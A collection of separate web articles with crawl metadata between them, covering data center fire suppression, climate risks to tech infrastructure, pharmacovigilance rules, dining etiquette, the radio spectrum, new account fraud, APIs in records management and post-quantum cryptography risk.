This is a shame, because information leads to understanding, which is the key to solving the problem. To solve the problem, we need a scientific examination of how these incidents occur. And it turns out this is exactly what has been happening.
At DCD’s Zettastructure event in London I heard about two very promising lines of enquiry that could make this problem simply disappear.
New nozzles - or better design?
Fire suppression vendor Tyco believes that with drives becoming more fragile, more gentle nozzles are needed. The company has created a nozzle which will not shake drives, and will eventually be available as an upgrade to existing systems. Product manager Miguel Coll told me that the new nozzle is just as effective in suppressing fires, but does not produce a damaging shockwave.
Science is the data center industry’s weapon in the war on risk and waste
That sounds like a problem solved - but there’s another approach. Future Facilities is well known for its computational fluid dynamics (CFD) software, which models the flow of air in data centers and is usually used to ensure that hot air is removed efficiently and eddies don’t waste energy.
When a fire suppression system is triggered, it expels air very quickly, and the physics is different. Future Facilities’ software wasn’t designed to model supersonic air flow, but the physics is pretty well understood, so the company approached a third party to simulate the gas flow created by a fast flood of fire suppressing gas. This was used to provide a “black box” model of the faster flow, including the shockwave produced by the flood of gas.
The model produced some interesting predictions. Future Facilities found that fire suppression systems could work just as well if the nozzles were placed further away from IT systems, where they would do no harm to hard drives. It seems that these systyems have been designed by old rules, which were created by authorities outside the data center industry and which predate today’s IT systems.
Future Facilities product manager David King reckons the research means that the whole problem can be avoided by simply placing the nozzles further away, according to CFD models of how they work.
The data center industry’s weapon in the war on risk and waste is science. The agenda of the Zettastructure event is online and the presentations will be available.
A version of this story appeared on Green Data Center News | <urn:uuid:3c58eb0f-b926-4fed-b0b7-adc62829514b> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/fire-suppression-gets-safer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00515.warc.gz | en | 0.965714 | 802 | 2.609375 | 3 |
With data centers shutting down thanks to extreme temperatures, should we get used to outages?
One of Twitter's main data centers in California was reportedly knocked out of action by extreme heat earlier this month, raising questions about the resilience of tech infrastructure to climate change.
According to internal memos seen by CNN, soaring temperatures in Sacramento led to a shut-down that threatened service to users. Carrie Fernandez, the company's vice president of engineering, warned Twitter engineers that the company was in a “non-redundant state.” If similar outages were to occur at the company's Atlanta and Portland data centers, she wrote, 'we may not be able to serve traffic to all Twitter's users.
The memos say that Twitter has been handling the problem by halting all non-critical updates, such as deployments and releases to mobile platforms, other than those needed to maintain continuity of service or other “urgent operational needs.”
The story supports statements made by whistleblower Peiter Zatko, who recently told the US Congress that Twitter had no plan as to how to recover from simultaneous outages.
Twitter hasn't confirmed the reports. However, if true, it's not the only time this has happened during the recent global heat wave. Earlier this summer, for example, both Google and Oracle were forced to shut down data centers in the UK, causing widespread outages for their clients.
Indeed, according to research from the Uptime Institute, almost half of data center operators have experienced an extreme weather event that has threatened their continuous operation, with nearly one in ten saying service had been disrupted.
And other tech infrastructure has also been affected, with Verizon recently forced to switch to emergency generators and backup batteries at six of its mobile switching centers in order to keep its network running.
Of course, extreme heat is far from the only effect of climate change. High winds, flooding, fire, and sea level rise can all place critical infrastructure under peril.
Firms are reacting in different ways. AT&T, for example, has worked with the US Department of Energy to develop a climate change analysis tool that projects flooding and winds in the Southeastern US over the next 30 years. The data is used to help plan the company's 5G network facilities.
Meanwhile, the National Oceanography Centre is working to determine where climate change is impacting subsea cable resilience and develop strategies to adapt.
Many data center operators are increasing their cooling capacity, with others shifting their facilities to northern climates or even underwater. However, this can't be a universal solution. In many regions of the world – large parts of Africa, for example – temperatures are consistently high, and large volumes of water are unavailable.
There are mitigations: passive cooling, for example, which ensures hot and chilled air do not mix, as well as immersive liquid cooling, where servers are held in a rack filled with coolant a thousand times more effective than air.
However, these solutions can only go so far. What seems likely is that infrastructure developers will build in more redundancy – extra back-up data centers and so forth – but only to the degree they see as absolutely necessary.
According to the Uptime Institute survey, more than a third of respondents said that their management has yet to formally assess the vulnerability of data centers to climate change. And as the planet heats up and extreme weather events become more frequent, the industry will remain one step behind. It seems likely that outages, whether at data centers or telecoms infrastructure, will become a far more frequent occurrence in the future.
More from Cybernews:
Subscribe to our newsletter | <urn:uuid:fe2478a9-94fa-4678-a3de-4dbcad940d18> | CC-MAIN-2022-40 | https://cybernews.com/editorial/climate-change-hits-tech-infrastructure/?utm_source=newsletter&utm_medium=email&utm_campaign=CyberNewsLetter_85 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00715.warc.gz | en | 0.963967 | 748 | 2.828125 | 3 |
Good Pharmacovigilance Practices
Good pharmacovigilance practices, also referred to as GVPs, are guidelines for pharmaceutical companies to follow to help prevent harm to humans caused by adverse drug reactions (i.e., ADRs) from approved pharmaceutical drugs. The main objectives and roles of good pharmacovigilance practices are:
- Promote the safe and effective use of pharmaceutical products
- Delivery timely information about the safety of medical products
- Evaluate observational data on pharmaceuticals, including drugs and medical, excluding blood components
- Provide guidance on the conduct of pharmacovigilance for specific product types or populations in which medical products are used
The guidance and rules set forth by good pharmacovigilance practices can vary slightly from one country to the next. Most countries have regulatory authorities that oversee compliance with good pharmacovigilance practices.
Let’s jump in and learn:
- What Is Pharmacovigilance?
- The European Medicines Agency and Good Pharmacovigilance Practices
- The Food and Drug Administration and Good Pharmacovigilance Practices
- Health Canada and Good Pharmacovigilance Practices
- Good Pharmacovigilance Practice Compliance
- Broad Benefits from Good Pharmacovigilance Practice
What Is Pharmacovigilance?
Although all medical products undergo rigorous testing for safety and efficacy through clinical trials before they are authorized for use, the testing only involves a relatively small number of selected individuals for a short period of time. Pharmacovigilance provides oversight of medical products over their entire lifecycle once they have been licensed for use. The science and activities that are part of pharmacovigilance help identify and evaluate previously unreported adverse reactions.
Pharmacovigilance includes the science and activities that provide a framework for the detection, assessment, understanding, and prevention of:
- Adverse drug effects
- Counterfeit or substandard medicines
- Interaction between medicines
- Lack of efficacy of medicines
- Medication errors
- Misuse and/or abuse of medicines
Pharmacovigilance also helps to:
- Determine if action is required to improve the safety of a medical product
- Ensure that healthcare professionals and patients have access to accurate information about medical products
- Identify changes in the frequency or severity of known adverse effects
- Uncover previously unknown adverse effects
The roles of pharmacovigilance can be broken down into three categories.
1. Surveillance to support risk management and the assessment of adverse reaction data to identify patterns.
2. Operations that focus on collecting and recording information during preclinical development, early clinical trials, and gathering real-world evidence of adverse events reported by medical professionals and patients after medical products are authorized for commercial use
3. Systems that are developed to store and manage data relating to pharmacovigilance compliance at all levels of an organization
The European Medicines Agency and Good Pharmacovigilance Practices
The European Medical Agency (EMA) released guidelines for good pharmacovigilance practices in 2012. The EMA’s good pharmacovigilance practices are a set of measures drawn up to facilitate the performance of pharmacovigilance in the European Union (EU). The EMA’s good pharmacovigilance practices are divided into 16 modules, each of which covers one major process in pharmacovigilance.
Included in the EMA good pharmacovigilance practices is the establishment of the Pharmacovigilance Risk Assessment Committee (PRAC), which is responsible for assessing all aspects of the risk management of medicinal products. The objective of the PRAC is to ensure that medicines approved for the European Union market are optimally used by maximizing their benefits and minimizing risks.
The Food and Drug Administration and Good Pharmacovigilance Practices
The Food and Drug Administration (FDA) issued its guidance for good pharmacovigilance practices in 2005. These are only guidelines and do not establish legally enforceable responsibilities. Instead, good pharmacovigilance practices guidance describes the FDA’s current thinking on a topic and should be viewed only as recommendations unless specific regulatory or statutory requirements are cited.
The FDA’s good pharmacovigilance practices guidance covers medicinal products, including biological and vaccines as well as over-the-counter (OTC) drugs and medical devices. The objective is to ensure that these medical products are safe and effective for human use.
The laws governing this area are the Federal Food, Drug and Cosmetic Act (FDCA) and the FDA Code of Federal Regulations (CFR) Title 21. These outline the requirements for drugs and medical devices for human use and provide the legislative framework and requirements that are implemented at a federal level.
Health Canada and Good Pharmacovigilance Practices
In 2004, Health Canada implemented an inspection program for good pharmacovigilance practices. The program is meant to verify that Market Authorization Holders (MAH) and importers meet the requirements of sections of Canadian Food and Drug Regulations. It also is meant to ensure proper tracking of adverse drug reactions and other post-approval reporting requirements.
The following medical products marketed in Canada for human use are subject to good pharmacovigilance practice compliance inspections:
- Biologics, including biotechnology products, vaccines, and fractionated blood products
- Medical gasses
Excluded from good pharmacovigilance practice compliance inspections in Canada are:
- Hard surface disinfectants
- Natural health products
- Veterinary products
- Whole blood and blood components
Good Pharmacovigilance Practice Compliance
The main objectives that good pharmacovigilance practice compliance ensure are the safe and effective use of pharmaceutical products by continuously monitoring, collecting, and providing patients, healthcare professionals, and the general public with timely information about the safety of medical products. Regulatory agencies, such as the FDA, Health Canada, EMA, and the UK’s Medicines and Healthcare products Regulatory Agency (MHRA), can conduct a good pharmacovigilance practice compliance audit at any time in a product’s life cycle (i.e., during a clinical trial, during the regulatory review/approval process, or after a product is on the market).
To be prepared for all aspects of a good pharmacovigilance practice compliance audit, organizations need to regularly review their pre-marketing and post-marketing safety monitoring practices to ensure they are in compliance.
To prepare for a good pharmacovigilance practice compliance audit, organizations should have a strong methodology and processes to gather and organize the key requirements of all the applicable regulatory bodies. This should include strategy, infrastructure, tools, execution, and evaluation details.
Inspectors will review records and procedures to assess compliance, including processes for receiving, analyzing, submitting, and maintaining records about adverse drug reactions, unusual failures in the effectiveness of new drugs, and the preparation of annual summary reports and issue-related summary reports. Management and reporting of ADRs include:
- Quality planning
- Establishment of structures and planning that are integrated with consistent processes (e.g., clear written standard operating procedures)
- Quality control
- Verification at every stage of case documentation, including data collection and data management (e.g., correct data entry and coding), minimum requirements are met for case validation, that compliance, quality, and integrity of data (e.g., source data have to be recorded and stored)
- Quality assurance
- Monitor and evaluate the programs that have been established and how effectively the processes are being carried out (i.e., using audit systems)
- Quality improvement
- Corrections and improvements to the structures and processes that require updates and/or enhancements
A good pharmacovigilance practice compliant rating means that an organization complies with good pharmacovigilance practice regulations. Note that an organization may receive a compliant rating even if a number of areas of non-compliance have been identified. This is because the good pharmacovigilance practice compliance rating also considers the level of risk.
In these cases, the organizations would be required to take corrective actions. A good pharmacovigilance practice non-compliant rating could mean either that the establishment has not shown that its activities comply with regulations, or that safety information is missing, which could lead to serious health risks. In either case, non-compliance organizations will need to take immediate corrective actions.
Broad Benefits from Good Pharmacovigilance Practice
Pharmacovigilance is central to drug safety. Good pharmacovigilance practice is predicated on the need for better planning and completing quality controls of pharmacovigilance activities. It provides an agreed-upon framework that helps organizations define better quality control systems and ensure the quality of safety of their use.
Following good pharmacovigilance practice benefits everyone. Consumers have confidence that medical products are safe and effective. Organizations, which are required to collect and maintain vast amounts of information to meet good pharmacovigilance practice compliance requirements, are able to also use that data for further research and development or for submissions needed for authorities to allow new markets to be accessed.
Egnyte has experts ready to answer your questions. For more than a decade, Egnyte has helped more than 16,000 customers with millions of customers worldwide.
Last Updated: 28th February, 2022 | <urn:uuid:d387f766-1950-48c8-a1de-e3f7eb035422> | CC-MAIN-2022-40 | https://www.egnyte.com/guides/life-sciences/good-pharmacovigilance-practice | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00715.warc.gz | en | 0.925234 | 1,895 | 3.21875 | 3 |
The Government Accountability Office said the U.S. government needs to plan and prepare for extreme weather events caused by climate change in order to significantly reduce its spending on disaster assistance.
In a report released Monday, the agency called for strong leadership and a cohesive, strategic approach to mitigate federal fiscal exposure to climate change.
GAO cited the U.S. Global Change Research Program and the National Academies of Sciences, Engineering and Medicine, which warned that the cost of disaster response and recovery efforts are projected to increase as extreme rainfall or drought become more frequent.
The government watchdog agency proposed establishing a national climate information system, assigning a federal entity to develop and update climate data, and building climate resilience into infrastructure and facility planning.
Lawmakers and federal agencies should review information on the potential economic effects of climate change so they can pinpoint significant risks and formulate better disaster responses, the agency added.
Government spending on disaster assistance amounted to $315 billion between its 2015 and 2021 fiscal years. GAO has petitioned since 2013 to limit federal fiscal exposure through enhanced climate resilience. | <urn:uuid:c55b38d2-5489-4b9d-ab57-2c72cc1a5981> | CC-MAIN-2022-40 | https://executivegov.com/2022/09/gao-federal-preparation-for-climate-hazards-could-reduce-disaster-costs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00715.warc.gz | en | 0.944677 | 215 | 2.859375 | 3 |
A solar probe Johns Hopkins University Applied Physics Laboratory designed and built for NASA has arrived at Lockheed Martin‘s Astrotech Space Operations facility in Florida to begin pre-launch tests and preparations.
APL said Thursday the Parker Solar Probe is scheduled to lift off July 31 at the Kennedy Space Center to study the sun’s outer atmosphere over a seven-year mission.
The spacecraft, named for astrophysicist Eugene Parker, will work to provide data for researchers to forecast major eruptions on the sun as well as space weather events that may affect ground-based technology, satellites or astronauts in space.
Parker Solar Probe will undergo comprehensive tests, final assembly and mating to a Delta IV Heavy rocket’s third stage at the Astrotech facility.
The launch preparation phase will also involve the installation of a thermal protection system designed to protect the spacecraft from the extremely hot temperature in the sun’s corona. | <urn:uuid:99ff0140-9505-4c14-ad7a-7665941c1817> | CC-MAIN-2022-40 | https://blog.executivebiz.com/2018/04/nasas-solar-probe-to-undergo-final-assembly-tests-at-astrotech-facility-in-florida/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00715.warc.gz | en | 0.908556 | 189 | 2.828125 | 3 |
Published On January 27, 2018An article that discusses the usability of API calls in information management.
Sun Microsystems, today part of Oracle Inc., surprised the world with TV commercials in the early Nineties claiming that “The Network is the Computer.” No one really understood it at the time. At the time most of us were dealing with client/server computing (a PC program communicating with a database) or with terminal-based host applications. A few bytes were sent back and forth, but depending on the scenario, the intelligence was either with the PC program or the mainframe computer, but certainly not with the network.
Then came the World Wide Web. It brought a uniform way to access information based on Hypertext Transfer Protocol (HTTP). Introduced for human-to-machine communications, HTTP soon paved the road for a concept called the Service Oriented Architecture (SOA) and on its coattails appeared protocols like WebServices and REST that enabled machine-to-machine communications.
SOA and the implementation protocols quickly picked up as, unlike their transaction monitor predecessors, the protocol standards were open and with open-source libraries freely available. SOA became the best-practice architecture for business systems integration. Even eternal ego-centric Microsoft had to buy into these standards else the company would have lost market momentum for its server products like Sharepoint. The main driver behind SOA was (and is) modularization and reuse of the enterprise software environment.
From there, it was a small step to a marketing buzzword like “Cloud”. To HTTP, it makes little difference if the called server (better: its IP address) is in-premise or elsewhere in the world. The rest is history. Be it within a single organization or on the public web – calling different information resources based on standardized APIs is the predominant information systems design model of our times. Such concepts come with different names but essentially perform the same: services, mash-ups, portals, microservices, and many more.
What is an API?
The term Application Programming Interface or API is today mostly used in the context of remote calls over the Web (we won’t dive into other meanings in this article). So we focus on the modern remote usage of such an interface and its impact on Records and Information Management (RIM).
An API essentially consists of these three parts:
Obviously, a request has to go somewhere. In the Web world, there is the so-called Uniform Resource Identifier (URI) that determines where in Web’s huge address space a service API shall be called
To read or write data to a certain address, clients and servers need to be able to talk to each other in an ordered way. The sequence of interactions over the network is called the protocol. The ubiquitous protocol for the Web environment is HTTP.
This is an area of special interest to RIM professionals. Few realize but the Web reinvented the significance of the document. It might not correspond with our idea of the well written official record, rather it is the currency of the web that is exchanged between parties. It is a snapshot of server’s data (sometimes called its “status”) that is brought to a certain format and gets transmitted. This mechanism is referred to as the serialization of the server state.
Given a particular client request, a client can expect to receive a document that contains the requested information in the requested format. The best-known document format is HTML, however, any format can potentially be exchanged as long as it conforms to a known protocol content-type, such as pdf, xml, tiff, etc..
To summarize these three terms in one sentence: a client calls an API at a certain address, following a strict communications protocol to interact; eventually, it will get a response back as a document in a format the server can deliver (hopefully what the client requested). The API is one side of the coin while the flip side is called implementation. That means that the API is the entry point for client requests and is independent (at least should be) of the actual implementation.
What does an API Driven World Signify for the Information Professional?
Huge amounts of information are crossing organizational boundaries via API calls. As the use of mobile devices and apps swells, the Internet of Things (IoT) grows and business process integration and digital transformation forge onward this trend will only increase exponentially. Other, more traditional means of communication, starting with physical paper or file transfer in the electronic world, may keep their absolute volume while the use of APIs will continue to explode.
API endpoints on the server side are gates where a lot of traffic passes by. It is an ideal point to capture data and measure usage of an Information Asset. Think of an eCommerce site. Orders come through the API door and it is relatively easy to capture all incoming orders and store them as records or at least tag them for later in-place management. This means effort on the implementation side and an important concept here is called interception. Interception is often used in cases where usage of data is not directly linked to the core mission of a transaction. Log files are often written via interceptors.
Then there is a set of APIs which is directly geared towards RIM functionality. If, for instance, your system needs to offer functionality to apply and lift legal holds, make that system “API-ready”. It is a future-proof approach to offer such functionality via an API, as opposed to a proprietary client. So eDiscovery systems, for instance, can request holds directly without knowing the intrinsic functionality of your system.
The importance of web-based APIs is paramount today and will become even more necessary in the future. Mobile, IoT, augmented reality glasses and digital transformation, to name a few, will all communicate via the Internet and use APIs to communicate. Hence, it is vital to the Information Professional to understand the mechanisms of how APIs works.
The incoming data may never get rendered as a traditional record. In particular, Records Management often still holds to the view that anything important gets eventually printed. With this perspective, you may not be able to capture the complete regulatory information, have it controlled by a consistent lifecycle management and satisfy legal production requests.
The next blog will dive into the importance of metadata in this context and how it is best managed. | <urn:uuid:860b45f0-6d05-40d6-a2dd-3a1c0c811378> | CC-MAIN-2022-40 | https://www.ironmountain.com/blogs/2018/its-an-api-driven-world | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00715.warc.gz | en | 0.940617 | 1,317 | 2.921875 | 3 |
Eating with groups is one of the most socially significant events that humans partake in, and if you care at all about:
- Not offending people
- Not appearing like a neanderthal
…you may want to review the following.
Some of these primers I make based on my own knowledge. Others I try to learn a little bit from as I assemble them. This is one of the latter.
Here are some of the more important rules for proper eating, broken down into various sections.
- Do not use your mobile device at the table. If you need to look at something, excuse yourself.
- In general, when receiving something, like bread or serving wine, offer or pour for others before serving yourself.
- Never chew with your mouth open.
- Do not reach across the table.
- Cut your food one piece at a time.
- Do not speak with food in your mouth.
- Do not pick your teeth at the table.
- Always say ‘excuse me’ when leaving the table for any reason.
- Men always check topcoats. Women have a choice.
- The first arrival always waits for the second before being seated.
- If there are both men and women dining, the women follow the matre d’, host, or hostess, and the men follow them.
- Men wait for the women to sit.
- Silverware is used from outside to in, so if you see four forks on the table, you’re going to potentially have four courses that require them (and they may be of different types).
- Hold your fork in your left hand, and your knife in your right. This is because the active activity is cutting, and that’s done with your dominant hand. But even if you’re left handed, you should eat with fork in left and knife in right.
- When using your knife, extend your index finger down the length of the blade, at least halfway down, and near where you’re cutting. Imagine you’re performing a precise surgery, not like you’re holding the top and sawing.
- The fork is held tines downward. It’s a precise instrument for bringing food to your mouth; not a scooping tool.
- Even if your knife is not needed, it remains on the table.
- When you rest to drink or to engage in conversation, place your knife and fork in an inverted “v”, with your tines facing downward, and your fork and knife crossing in the center. The fork is on top.
- When you finish your plate, and are ready for it to be taken away, place your knife and fork parallel at the 4’oclock position, with the fork in the center and tines down.
- Utensils are usually replaced between courses, even if you’re not moving through the formal groupings already on the table.
- During informal meals, some hold their fork tines upward, American style (yes, that’s bad), but it’s still in the left hand.
- Silverware should never touch the table.
- You pass food to the right.
- As you pass, you hold the dish for the receiver to serve themselves. They should only use the serving utensil provided.
- Heavy or difficult dishes are always put on the table for each pass before serving.
- If you pass something with a handle, the handle goes towards the receiver.
Salt and pepper
- Always taste food before you add salt or pepper.
- Always pass the salt and pepper together, even if only one was asked for.
- If you’re offered a salt cellar instead of a shaker, either use the spoon that’s in it, or the tip of a clean butter knife.
- If the cellar is for just you, you can use your own knife or use your fingers to take a pinch.
- If you’re sharing the cellar, never use your fingers or a dirty knife.
- Salt you’ve taken from the cellar should be put on the bread and butter plate, or the rim of the plate currently in front of you.
- If the bread is placed in front of you, feel free to pick it up and offer it to the person on your right.
- If the loaf is not cut, cut a few pieces and offer them to the person on your left, and then pass it to the right.
- Use the cloth in the bread basket to handle the loaf. Do not touch the bread with your hands.
- Place bread for yourself on your butter plate (which is on your left).
- To eat your bread, break off a bite-sized piece, butter it, and eat it.
- Don’t butter the entire piece and take bites from it.
- Don’t hold your bread in one hand and a drink in another.
- Never take the last piece of bread without asking everyone else if they want it.
– Your water glass is the one above your knife.
- The waiter gets 15% to 20%.
- Especially good service under adverse conditions gets another 10% to 15%.
- Sommeliers get 15% to 20% of the wine bill, assuming they provided actual value.
- Tip discreetly; it’s trashy to be extravagant with it.
- If you’re a regular, consider tipping the host 10% to 20% of the meal every once in a while to say thank you for their services.
- If you’re waiting at a bar for a table, you should tip $1 to $2 per drink.
- If you’re drinking at a bar, tip the same as food (15% to 20%).
- Bathroom attendants should receive 1$ to 5$, depending on the services provided. Handing you a towel is $1 or $2. If they brush your jacket or provide mints or mouthwash in addition, consider giving up to $5.
- If the attendant has a tray where tips are being accrued, tip there instead of handing it to them.
- Tip musicians using visible receptacles when present, and the amount should be around $1 to $2 per musician. Add a few dollars for special services such as fulfilling requests and/or being especially good or attentive.
- Make sure beforehand that you are to receive the check.
- Place the bill on the edge of the table with the bill and credit card slightly visible.
- The American style resting position is to have the fork, tines upward, at an roughly 4’oclock position, with the knife at a 1’oclock tangent position facing inward.
- The American style finished position is identical to the Continental, except the fork’s tines are facing upward.
- I’m using Continental style rules here, which I believe to be the most pure given the history. American rules differ slightly in a few ways you can research on your own.
- There are some who think it ok to eat with your fork in your right hand if you’re left-handed, but my research has indicated this is not true. The fork stays in the left hand.
- I reviewed dozens of resources to make this summary, but http://www.etiquettescholar.com was especially useful. | <urn:uuid:24b3496e-e67d-4543-af65-ead0bb9956e2> | CC-MAIN-2022-40 | https://danielmiessler.com/study/dining/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00115.warc.gz | en | 0.918567 | 1,582 | 2.65625 | 3 |
The radio spectrum refers to electromagnetic waves that are picked up by the antenna. They include the famous FM and AM radio bands, as well as the “short wave” radio picked up by a CB. Here’s a little information about how this spectrum works.
Radio Spectrum Overview
Radio waves specifically are a small spectrum of waves on the bigger EM spectrum. There are seven different parts of the EM spectrum, and they are organized by wavelength, frequency, and energy. The seven include radio waves, microwaves, infrared, visible light, ultraviolet and gamma rays. They go from a higher wavelength to lower wavelength and lower energy and frequency to lower as you get further down the scale.
Radio waves, in particular, have the longest wavelengths in this spectrum. They range from about 1 millimeter to over 62 miles long. Additionally, they have the lowest frequencies in the EM spectrum going from 2,000 cycles per second all the way up to 300 billion hertz, or 300 billion cycles per second.
It’s a big range, but it’s worth noting that since there are so many people transmitting on this range, it quickly gets a lot smaller, especially since there are areas of the range that are more valued than others. Some people compare it to land. Farmers have to find the best land for their purposes, and those who use radio waves have to do this as well.
In the United States, the National Telecommunications and Information Administration manages these allocations for different frequencies. The different bands have different designations. There’s “Extremely Low Frequency,” or “ELF,” which covers anything above 100 KM in wavelength range and a frequency under 3 kHz, for example. Then there’s very low frequency, VLF, low frequency, LW, medium Frequency, MF, high frequency, HF, and so on down the line until you get extremely high frequency which covers a wavelength range of just 1 millimeter or so.
The VHF, HF and UHF bands are what tend to be used for FM radio, for the sound on broadcast television, and things like cellphones and GPS. This is one of the reasons why the quality of this type of radio, FM radio specifically, tends to be quite good. The environment isn’t going to affect the frequency as much, partly because FM can handle changes in frequency more easily since it’s so high. This is where the name comes from, “Frequency modulation.”
Shortwave frequencies are usually in the HF band, and they constitute ranges from 1.7 megahertz to 30 megahertz, meaning millions of times per second. These transmissions can be heard for huge distances, up to thousands of miles since they can bounce off of the atmosphere. This allows you to talk to just about anyone anywhere, right through a radio without necessarily needing a phone or other means of communication.
Overall, there many communication applications for radio waves, all depending on their exact characteristics. | <urn:uuid:53463cd0-3563-44e9-920a-052952e44756> | CC-MAIN-2022-40 | https://mytekrescue.com/how-the-radio-spectrum-works/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00115.warc.gz | en | 0.948284 | 618 | 3.921875 | 4 |
Fraudsters constantly find ways to overcome security measures taken by companies. Among the most targeted are financial institutions.
Detecting fraud can be hard, especially if you are not aware of them. The best protection is to strengthen security through authentication. Aside from traditional verification processes, adding passwordless authentication can help.
New Account Fraud (NAF)
One type of fraud that you should be aware of is New Account Fraud (NAF). It targets different payment accounts using mobile and/or digital channels. These include debit or credit cards, demand deposit accounts (DDAs), online merchants, and card not present (CDP) accounts.
Fraudulent activities have increased through the years. In 2018, new accounts with credit card fraud were up 4%. New fraudulent mobile accounts increased by 28%. New fraudulent bank accounts had a 12% rise.
Use of Identity
There are two ways of using identity for NAF attacks. First, the fraudsters steal legitimate identities. Second, they create synthetic identities.
What is the difference?
Legitimate identities include data sourced from data breaches, phishing, and/or hacking. These will be used to open accounts. Thus, using the name of the victim. The fraudsters will pretend to be the person whose identity they have stolen. They often do this to bypass authentication, intercept communications from financial institutions, or conduct deposits and withdrawals to establish a pattern that will convince the financial institution that they are the owners of the account.
After gaining the trust of the financial institution, they will conduct other activities. They may apply for loans, request credit limit increases, make purchases, withdraw funds, transfer money, or generate fraudulent checks. All of these will be done without the knowledge of the legitimate account holder.
Meanwhile, synthetic identity is a made-up identity. Fraudsters can fabricate an identity using completely fictitious information. They can opt to manipulate an identity using modified real personally identifiable information (PII). Another way is identity compilation, wherein fraudsters combine real and fabricated PII.
The synthetic identity will be used to build credit. They will apply for a bank account or credit card. This way, they can bypass the identification and verification process. They will create a username and password for online transactions. Then, they can start committing payment fraud.
While fraudsters use technology to conduct NAF attacks, financial institutions can also use it to their advantage. Improve cyber security to prevent being a victim of fraud. What you can do is by including multiple layers of security. Doing this makes it more difficult for fraudsters to bypass. Include different technologies, such as passwordless authentication, biometrics authentication, and even OTP. | <urn:uuid:fc778fb9-06e4-4aff-a46c-ccb9add277cd> | CC-MAIN-2022-40 | https://noknok.com/understanding-new-account-fraud-and-how-to-fight-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00115.warc.gz | en | 0.915155 | 543 | 2.703125 | 3 |
What are User Defined Functions (UDFs)?
User Defined Functions, or UDF, define functions that perform specific tasks within a larger system. Often used in SQL databases, UDFs provide a mechanism for extending the functionality of the database server by adding a function that can be evaluated in SQL statements.
Why use User Defined Functions (UDFs)?
UDFs allow you go beyond what you can do with SQL.
Latest User Defined Functions Insights
If unstructured data is forced into a structure, it is likely to lose some of the meaning and value behind it. Learn how to cope with unstructured data by using User Defined Functions.
Want to dive deep into tech topics as automatic vs. manual software testing, Virtual Schemas, or would just like to get some compelling tech book recommendations? Look no further.
Mining natural language for business insight might involve some difficulties; however, detecting happy customers, angry customers or potential sales opportunities is a real reward.
Interested in learning more?
Whether you’re looking for more information about our fast, in-memory database, or to discover our latest insights, case studies, video content and blogs and to help guide you into the future of data. | <urn:uuid:78f6c307-0eb2-4ff4-bab9-5bbc0c29ab07> | CC-MAIN-2022-40 | https://www.exasol.com/glossary-term/user-defined-functions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00115.warc.gz | en | 0.904368 | 258 | 2.84375 | 3 |
We’ve all seen the scary stories about how quantum computing will break the secure communications that we take for granted today – but no one can say for sure when, or even if, this will happen. So, should you be worried?
The main threat from quantum computing to data security is that it will break the Diffie-Hellman protocol and thus Transport Layer Security (TLS), which is almost universally used to protect the confidentiality and integrity of data in motion over untrusted networks. (We’ll leave aside blockchains and Web 3.0, as that’s another topic in its own right.)
Quantifying the Risk
Given the significant technical barriers still to be overcome at the very forefront of quantum physics, it looks unlikely that quantum computing will advance to the point where it is a threat to classical cryptography within the next few years; and we will probably get plenty of warning as the necessary scientific breakthroughs gradually bring the possibility within reach.
Nonetheless, organizations should certainly be aware of the quantum computing threat and attempt to quantify the potential risk, bearing in mind that TLS sessions could be captured by an adversary today and then decrypted in the future once they have access to viable quantum computing resources. The following factors should be considered:
- How much of my data is at risk? (which data has the potential to be captured by an adversary)
- How sensitive is that data? (what is the value of the data and the impact if it fell into the wrong hands)
- What is the “lifetime” of my data? (will it still be sensitive when quantum computers are available? This could be in as little as 5-10 years in the worst case, though it could be much longer – no one really knows)
- Where is the threat coming from? (given my company’s business and the nature of the data, who would potentially want to capture it, and what might they do with it?)
- What opportunity do they have to capture the data? (could they gain access to the networks carrying the data?)
- When will they have quantum computing capabilities? (state actors are likely to have access to viable quantum computing resources before organized criminals, who in turn will have access before lone hackers)
For the vast majority of organizations, the risk is likely to be very small today and will only impact particularly sensitive data with a long lifetime. But this risk will change over time, so it should be re-evaluated periodically.
Mitigating the Risk
If you have sensitive data with a very long lifetime today, then you should note the risk of using TLS if there is a possibility of interception. Depending on the capabilities of your adversary, this could mean using more secure networks and/or using different protocols (e.g. IPSec with pre-shared key). Note that the current candidate post-quantum algorithms are still largely unproven and should not be relied upon today.
For everything else, you should start looking at your infrastructure and make sure all relevant communication endpoints are capable of being upgraded to use post-quantum algorithms within a reasonable timeframe (e.g., 3 to 5 years). Avoid buying new solutions that are not upgradeable. Also, be aware of the likely performance hit of using these algorithms.
However, it will likely be another few years before post-quantum algorithms have been standardized and are suitable for production use. Even then, these new algorithms will remain somewhat unproven, and as such it will probably be necessary to use hybrid protocols combining both classical and post-quantum algorithms for a time.
You should also implement a centralized key management system, ensuring all your cryptographic keys are managed in accordance with best practices and giving you the ability to efficiently migrate to post-quantum algorithms when the time comes.
Finally, follow NIST’s activities to keep abreast of developments in the fast-changing world of post-quantum cryptography.
You’re in Safe Hands with Fortanix
